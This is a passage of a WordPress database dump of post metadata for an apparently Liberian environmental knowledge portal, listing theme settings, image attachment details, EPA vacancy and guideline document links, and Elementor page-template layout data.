551,'kava_extra_audio_autoplay','false'),(31935,4551,'kava_extra_audio_preload','false'),(31936,4551,'video_tab',''),(31937,4551,'kava_extra_video_type','library'),(31938,4551,'kava_extra_video_library',''),(31939,4551,'kava_extra_video_external',''),(31940,4551,'kava_extra_video_poster',''),(31941,4551,'kava_extra_video_width','770'),(31942,4551,'kava_extra_video_height','480'),(31943,4551,'kava_extra_video_loop','false'),(31944,4551,'kava_extra_video_autoplay','false'),(31945,4551,'kava_extra_video_preload','false'),(31952,4556,'_last_editor_used_jetpack','classic-editor'),(31953,4556,'_edit_lock','1679120313:38'),(31954,4556,'_edit_last','38'),(31955,4557,'_wp_attached_file','2022/01/Screenshot-63.png'),(31956,4557,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:25:\"2022/01/Screenshot-63.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"Screenshot-63-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"Screenshot-63-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31957,4558,'_wp_attached_file','2022/01/Chemical-Guideline-Ready-for-Website.pdf'),(31958,4556,'_wp_page_template','default'),(31959,4556,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/01/Chemical-Guidelines-original.pdf'),(31960,4556,'by','EPA'),(31961,4556,'year','2022'),(31962,4556,'_pods_document_cover_image','a:1:{i:0;i:4557;}'),(31966,4561,'_last_editor_used_jetpack','classic-editor'),(31967,4561,'_edit_lock','1647611408:42'),(31968,4561,'_edit_last','42'),(31969,4562,'_wp_attached_file','2022/01/Final-ToR-CIS.-Proj.-Coord4131.pdf'),(31970,4561,'_wp_page_template','default'),(31971,4561,'closed_date','2022-02-11'),(31972,4561,'owner','EPA'),(31973,4561,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/01/Final-ToR-CIS.-Proj.-Coord4131.pdf'),(31974,4566,'_edit_lock','1644327463:42'),(31975,4566,'_last_editor_used_jetpack','block-editor'),(31976,4567,'_wp_attached_file','2022/02/world-wetland-day.png'),(31977,4567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2022/02/world-wetland-day.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:28:\"world-wetland-day-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:29:\"world-wetland-day-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31980,4566,'_wp_old_date','2022-02-08'),(31981,4566,'_thumbnail_id','4567'),(31982,4566,'_edit_last','42'),(31983,4566,'kava_extra_enable_breadcrumbs','inherit'),(31984,4566,'post_formats',''),(31985,4566,'gallery_tab',''),(31986,4566,'kava_extra_gallery_images',''),(31987,4566,'link_tab',''),(31988,4566,'kava_extra_link',''),(31989,4566,'kava_extra_link_target','_blank'),(31990,4566,'quote_tab',''),(31991,4566,'kava_extra_quote_text',''),(31992,4566,'kava_extra_quote_cite',''),(31993,4566,'audio_tab',''),(31994,4566,'kava_extra_audio',''),(31995,4566,'kava_extra_audio_loop','false'),(31996,4566,'kava_extra_audio_autoplay','false'),(31997,4566,'kava_extra_audio_preload','false'),(31998,4566,'video_tab',''),(31999,4566,'kava_extra_video_type','library'),(32000,4566,'kava_extra_video_library',''),(32001,4566,'kava_extra_video_external',''),(32002,4566,'kava_extra_video_poster',''),(32003,4566,'kava_extra_video_width','770'),(32004,4566,'kava_extra_video_height','480'),(32005,4566,'kava_extra_video_loop','false'),(32006,4566,'kava_extra_video_autoplay','false'),(32007,4566,'kava_extra_video_preload','false'),(32008,4569,'_last_editor_used_jetpack','classic-editor'),(32009,4569,'_edit_lock','1647610896:42'),(32010,4569,'_edit_last','42'),(32011,4570,'_wp_attached_file','2022/02/Financial-Management-Specialist-.pdf'),(32012,4569,'_wp_page_template','default'),(32013,4569,'closed_date','2022-02-18'),(32014,4569,'owner','EPA'),(32015,4569,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/02/Financial-Management-Specialist-.pdf'),(32016,4572,'_wp_attached_file','2022/02/Hydrology-Specialist-.pdf'),(32017,4573,'_last_editor_used_jetpack','classic-editor'),(32018,4573,'_edit_lock','1647610927:42'),(32019,4573,'_edit_last','42'),(32020,4574,'_wp_attached_file','2022/02/M-E-Specialist.pdf'),(32021,4573,'_wp_page_template','default'),(32022,4573,'closed_date','2022-02-21'),(32023,4573,'owner','EPA'),(32024,4573,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/02/Hydrology-Specialist-.pdf'),(32025,4576,'_last_editor_used_jetpack','classic-editor'),(32026,4576,'_edit_lock','1647610656:42'),(32027,4576,'_edit_last','42'),(32028,4576,'_wp_page_template','default'),(32029,4576,'closed_date','2022-02-21'),(32030,4576,'owner','EPA'),(32031,4576,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf'),(32032,4579,'_elementor_edit_mode','builder'),(32033,4579,'_elementor_template_type','single-post'),(32034,4579,'_elementor_version','3.4.3'),(32035,4579,'_elementor_pro_version','3.3.6'),(32036,4579,'_wp_page_template','default'),(32037,4579,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c755a3b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"482e8d8\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"custom_text\":\"Go to Institution\'s Website\",\"custom_url\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"show_icon\":\"none\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"3980bf4\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}],\"text_color\":\"#008000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(32039,4579,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(32040,4579,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(32042,3901,'_elementor_controls_usage','a:9:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:2;s:7:\"padding\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:21:\"background_background\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}s:25:\"theme-post-featured-image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:1;}s:18:\"section_text_style\";a:3:{s:10:\"text_color\";i:2;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:7:\"link_to\";i:1;s:10:\"image_size\";i:1;s:4:\"link\";i:1;s:5:\"image\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:2;}s:15:\"_section_border\";a:2:{s:14:\"_border_border\";i:2;s:13:\"_border_width\";i:2;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:5:{s:4:\"menu\";i:2;s:11:\"align_items\";i:2;s:7:\"pointer\";i:2;s:6:\"layout\";i:1;s:12:\"submenu_icon\";i:1;}}s:5:\"style\";a:1:{s:23:\"section_style_main-menu\";a:5:{s:15:\"color_menu_item\";i:2;s:21:\"color_menu_item_hover\";i:2;s:28:\"padding_horizontal_menu_item\";i:2;s:26:\"padding_vertical_menu_item\";i:2;s:18:\"menu_space_between\";i:2;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:2;s:8:\"_padding\";i:2;}}}}}'),(32043,4580,'_elementor_edit_mode','builder'),(32044,4580,'_elementor_template_type','single-post'),(32045,4580,'_elementor_version','3.4.3'),(32046,4580,'_elementor_pro_version','3.3.6'),(32047,4580,'_wp_page_template','default'),(32048,4580,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c755a3b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"482e8d8\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"custom_text\":\"Go to Institution\'s Website\",\"custom_url\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"show_icon\":\"none\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"3980bf4\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}],\"text_color\":\"#008000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful 